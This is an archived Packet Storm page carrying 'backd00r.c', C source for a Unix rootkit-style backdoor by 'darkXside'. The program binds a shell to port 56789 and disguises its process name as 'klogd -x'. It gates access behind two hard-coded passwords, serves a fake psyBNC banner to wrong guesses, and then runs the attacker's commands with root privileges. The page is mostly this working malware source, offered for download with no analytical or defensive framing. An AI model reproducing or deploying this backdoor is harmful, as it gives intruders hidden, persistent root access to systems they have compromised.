exploit the possibilities

backd00r.c

backd00r.c
Posted Mar 15, 2005
Authored by darkXside

Unix bindshell backdoor that acts as psybnc if the password fails.

tags | tool, rootkit
systems | unix
MD5 | fd338c62f08e87b4b033bc88a47f9b9c

backd00r.c

Change Mirror Download
/* simple bindshell that acts like a psybnc 
* author: darkXside
* root@linuxkiddie.org
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <strings.h>
#include <fcntl.h>
#include <pwd.h>

#define password "q1w2e3r4"
#define password2 "r00tm3"
#define PORT 56789
#define HIDE "klogd -x"
#define user "root"
#ifdef sys
#endif
#define check(pass) strcmp(password, pass)
#define check2(pass2) strcmp(password2, pass2)
#define narf(buf) fgets(buf,256,stdin); if(*buf) buf[strlen(buf)-2]= '\0';
#define sddr struct sockaddr
#define LOG 5

static void box(void);
static void checked(void);
static void command(const char *input);

int r00t = 0, euid = 0;

flushit (char *toflush)
{
fflush (stdout);
fflush (stderr);
fflush (stdin);
}
int
main(int argc, char **argv)
{


int sockfd, connfd;
struct sockaddr_in servaddr;
struct passwd *pwd;

char pass[256];
char pass2[256];
char buf[246];
char input[80];
if (!geteuid()) {
++r00t;
if ( (pwd = getpwnam(user)) != NULL)
seteuid(euid = pwd->pw_uid);
}
if (fork() != 0)
exit(0);

memset(argv[0], ' ', strlen(argv[0]));
strcpy(argv[0], HIDE);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0);
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(PORT);
servaddr.sin_addr.s_addr = htonl(INADDR_ANY);


if (bind(sockfd, (sddr *)&servaddr, sizeof(servaddr)) < 0)
;

if (listen(sockfd, LOG) < 0);

for (;;) {
if ( (connfd = accept(sockfd, (sddr *)NULL, NULL)) < 0)
continue;

if (fork() != 0) {
dup2(connfd, STDIN_FILENO);
dup2(connfd, STDOUT_FILENO);
dup2(connfd, STDERR_FILENO);

close(connfd);

narf(pass);
if (check(pass) == 0) {
bzero(&pass, sizeof(pass));

printf("\nBackdoor by darkXside\n");
pwd = getpwuid (getuid());
if (pwd == NULL)
printf ("\n");
else
{
printf ("\n");
printf ("Enter the second password.\n");
fflush (stdout);
narf(pass2);
flushit (pass2);
if (check2(pass2) == 0) {
bzero(&pass2, sizeof(pass2));
printf ("\nPassword accepted!\n");
checked();
}
}
}
else
{
printf (":Welcome!psyBNC@lam3rz.de NOTICE * :psyBNC2.3.2-4\n");
exit (0);
}

exit(0);
}
close(connfd);
}
exit(0);
}
static void
box(void)
{

struct utsname buf;
char *dir;
dir = (char *) getcwd(NULL, 0);

printf ("[backdoor]# ");
fflush(stdout);
}

static void
checked(void)
{

char input[256];

chdir("/dev/.tty01");
for (;;) {
box();
narf(input);
seteuid(0);
command(input);
seteuid(euid);
}
}


static void
command(const char *input)
{
#ifdef sys
char cmd[256];
#endif


if (!strncmp(input, "cd ", 3)) {
if (chdir(input +3) < 0)
perror("chdir");
return ;
}

if (!strcmp(input, "exit")) {
printf("m\nSee ya later...\n");
exit(0);
}



system(input);
}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    1 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    12 Files
  • 13
    Feb 13th
    18 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    19 Files
  • 20
    Feb 20th
    20 Files
  • 21
    Feb 21st
    15 Files
  • 22
    Feb 22nd
    2 Files
  • 23
    Feb 23rd
    2 Files
  • 24
    Feb 24th
    16 Files
  • 25
    Feb 25th
    37 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close